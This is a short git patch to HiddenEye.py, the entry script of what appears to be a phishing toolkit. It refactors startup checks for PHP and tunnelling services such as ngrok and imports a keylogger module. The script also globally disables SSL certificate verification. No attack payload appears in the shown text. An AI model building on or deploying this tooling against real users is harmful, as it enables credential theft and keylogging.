From bdd767d03c932c93c6ff07bc854afa75615411c3 Mon Sep 17 00:00:00 2001 From: sTiKyt Date: Wed, 13 May 2020 18:45:44 +0300 Subject: [PATCH] Removed old methods, integrated new ones --- HiddenEye.py | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/HiddenEye.py b/HiddenEye.py index 9e68510..33d9c68 100755 --- a/HiddenEye.py +++ b/HiddenEye.py @@ -4,7 +4,6 @@ # This is free software, and you are welcome to redistribute it # under certain conditions; you can read LICENSE for details. # -from Defs.Checks import * from os import system, environ import Defs.ActionManager.main_runner as main_runner import Defs.FeatureManager.keylogger as keylogger @@ -26,15 +25,15 @@ if agreement != True: if(not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None)): ssl._create_default_https_context = ssl._create_unverified_context -checkPermissions() -checkConnection() -verCheck() -checkPHP() -checkLocalxpose() -checkNgrok() -checkOpenport() -checkPagekite() -checkLT() +simple_informant.check_permissions() +simple_informant.verify_connection() +# verCheck() # For now it's useless, i'll rewrite it later, after release. +simple_informant.check_php() +#checkLocalxpose() + +#checkOpenport() +#checkPagekite() +#checkLT() if __name__ == "__main__": try: